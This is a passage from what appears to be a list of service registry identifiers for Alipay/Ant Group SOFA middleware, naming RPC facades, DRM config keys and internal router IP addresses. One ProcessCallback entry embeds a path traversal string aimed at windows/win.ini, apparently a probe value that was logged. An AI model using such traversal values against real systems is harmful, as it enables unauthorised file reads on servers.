ID#@#SOFA","com.alipay.cicada.common.service.facade.api.AppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.link.facade.TopicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.privatecloud.offer.OfferQueryForPCFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finannafccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.CcWorkCalendarQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.general.insure.custom@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_RQ_Notify_1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.comparacenter.common.service.facade.client.DistrictQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.manage.facade.api.internal.ParmTrunkDirectlyQueryWrapperFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.65.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.udataservice.service.facade.DataSetQueryServiceFacade:1.0:mrchexternal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.aip.notify.AppMsgSender:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.acbillingcore.common.service.facade.AccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.config.api.SceneConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.elf.facade.console.conf.DomainConfManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.tradepush.OrderPushFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.download.DownloadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.facade.api.monitor.BizStatusService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.mall.homepage.ShopItemsListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gfmac_ProcessBizBudgetActiveCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-S-TRADE-BATCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundprod.common.service.facade.query.QuerySignContractStatusService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:acmantyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcraftsman.common.facade.alsc.CraftsmanQueryAlscFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.tradeexprod.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.FundAssetProfitQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.api.product.ProductQueryFacade:1.0:PDCORE_SSCMW1CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.pcreditInstallmentPreDeduction,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssJsonValueFilterEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmcustprod.common.service.facade.api.UserProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PROMOMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_MOBILE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.125.255#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insopenprod.common.service.facade.api.RenderEngineServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.defaultYebProduct,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.policy.api.QueryValidateProductRepositoryService:1.0:uctfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.common.dal.daointerface.UkeyBindInfoDAO:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.company.CompanyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_promoguard_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfinvest.facade.api.cust.customtag.CompanyFinancialTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.MrchisSpLeadsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alphad.common.service.facade.datamng.api.AdfCollectionMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.cacheType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:workflowAntProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.yingxutestGZTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoguard.common.service.facade.capacity.api.FlowSceneManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_BANK_DAILY_BALANCE_AUTO_ARCHIVE_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchpunish.facade.csmng.AppPunishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.ps.user.UserGrowthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.product.spi.Validator:1.0:bic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.LoginService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.lastFailNotifyTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.discount.common.service.facade.campaign.CampInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:unitradeadapter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:smartscene@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.ApiArgManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.risk.api.CePrizeEmulateReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundprod2:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.couriercore.common.service.api.MessageSubscribeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.codec.QrImageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.localcacheProvider,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imobileprod.common.service.api.facade.codec.CodecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.QcTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_SECURITYPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.paymentmng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.pkgCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.yunfengdieweb:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrp.service.facade.ConfigContentNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.ps.user.UserTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerZsApplyInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.cJBAccountOpenConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.core.config.drm.MftransFailoverDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.core.service.sync.service.CGCPSyncDataSaveService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.facade.api.FileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kabaoprod.biz.mwallet.pass.manager.PrepayCardManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.LogicalEventObserverApi:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.178.247#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_WX_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC-pcinstacc-parsefinorm-schedule-serverless@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeModelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.27.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkpayplatform.common.service.facade.spi.BizOrderQueryCallbackService:1.0:bkebppcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:crmhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.recon.TaskSummaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datashield.facade.scene.SceneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.RiskReportDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.tips.TipsTopicManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.supergw.service.facade.transaction.MessageSendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundcore.common.service.facade.MultiVersionIndicatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.crowd.CrowdRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.filex.admin.SystemConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.evaluate.BuffettAutoMonitorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:recruitcore_planPublishAuditCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.ProductPoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_P_antchaos#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promocenter.facade.api.wealth.WealthActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.142.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.api.AutoInvestPlanYieldFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.loancore.common.service.facade.alipay.api.rzone.query.ZlcBudgetQueryRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.232.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.etetestcore.etetestcoreDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.228.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileapp.common.service.facade.spi.NegativeScreenCardInvokeService:1.0:uioservice_cardInvokeService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.fcbuservice.common.service.facade.RoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchiscore.common.service.facade.ArAdjustFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.ClientCustomerSlimSwitch.fullAccessSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iprofile.facade.dqs.api.IProfileInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.161.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassistantcore.common.service.facade.annotation.api.AnnotateTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-alphatesttwatest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.core.service.emulator.common.logsim.differ.OeEmulatorRootComparer:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openitemcore.common.service.facade.api.statistics.StatisticsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alibaba.dataphin.resource.ide.facade.api.IdeResourceOpenService:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.LogWriteoffFacade:1.0:arLogWriteoffFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.accesstoken.AccessTokenManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IMOBILEGMP#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pushcore.template.GotoneTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exchangecore.common.service.facade.api.AdviceAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mytradeapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bktradecore.common.service.facade.api.order.BizOrderFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.robot.RobotInsertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iacquirefrontTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.operator.common.service.facade.PermissionConditionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.uctfront:name=com.alipay.analyze.core.extension.tier.module.drm.DecisionModelControlResource.openDomainFuseModuleRatioStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhbprod.common.service.facade.MessageBoxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchportalcore.common.service.link.facade.StoreAppraiseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.habaseline.common.facade.service.metadata.MetadataQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MarketingConfigDrmResource.marketingNewUserIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sdaota@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.23.240.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ck:name=com.alipay.zdal.config.groupCluster.versa_io_test.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.common.service.facade.backmanagement.CommentManagementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vein.winbillboard.common.service.facade.defense.IBetaChangeSwitch:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundcore.common.service.facade.HotspotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.platform.xts.bacs.spi.PaymentTransFinalizer:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pointprod.common.service.instruction.InstructionQueryIntegratedService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:pcreditweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchselfop.common.service.facade.activity.OperationActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.core.model.schedule.repository.ScheduleOrderRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cxbiz.membersolution.common.service.facade.api.promotion.PromotionPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.orderfront:name=com.alipay.orderfront.task.config.singlePartitionTaskNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.242.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfinvest.facade.api.investtrade.InvestSecurityDealBaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcp.service.facade.kb.common.KbVisitPurposeCorrelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.79.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tairmanager.interfaces.endpoint.facade.rest.workflow.WorkflowFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.achelmetcore.common.service.facade.SceneParamDefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsParamsDRMResource.minTargetAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_ST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_solutionCenterService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:tabBarforOcrService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileorderprod.service.rpc.CategoryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINANCEMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.72.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.225.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.AntVipDefaultAppName:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientSyncRemoveDRM.monitorRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_workflow_workflowProductGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promodataprod.common.service.facade.service.VerifyRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxbase.common.scheduler.SchedulerHandler:1.0:collectHistoryPredictDataHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.enableRMCAntq,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finmobilemarket.common.service.facade.api.FundTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0://\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkloandecision.service.facade.agds.PolicyFlagQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.230.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tradequote.api.SnapshotListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.core.service.ldc.drm.CZoneCacheConfigDRMImpl.threshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityexprod.biz.lisa.service.eworkcard.EntCompInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:lifemsgprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.envcenter.common.service.facade.api.AcceptPackageUploadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.schedule.BusinTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.afwrobottwa:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.userResolverTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dmirror:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finannafccore.common.service.facade.script.api.FinAdvisorScriptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.EventTemplateServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.MobileCityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recadmin.cases.facade.CaseManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mychain.baas.common.user.service.UnionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ap.cashier.common.service.facade.api.AssetAssignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.72.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.giftprod.common.service.facade.GiftStatQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.common.service.facade.HomeCardStyleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdish.common.service.facade.api.view.KbdishCookFilterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:mobilesecurity@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.activity.ActivityMaterialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.finsupport.component.cache.masterdata.drm.MasterdataDRM.checkResultCode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.acsellcore.common.service.facade.AttachmentFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ck:name=com.alipay.zdal.config.groupCluster.mobilebc_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.service.CollectRewardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.apppackage.PackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CardQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.l2cache.L2CacheClientSwitch.degradeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custprod.service.spi.BindingBankCardExtFacade:1.0:b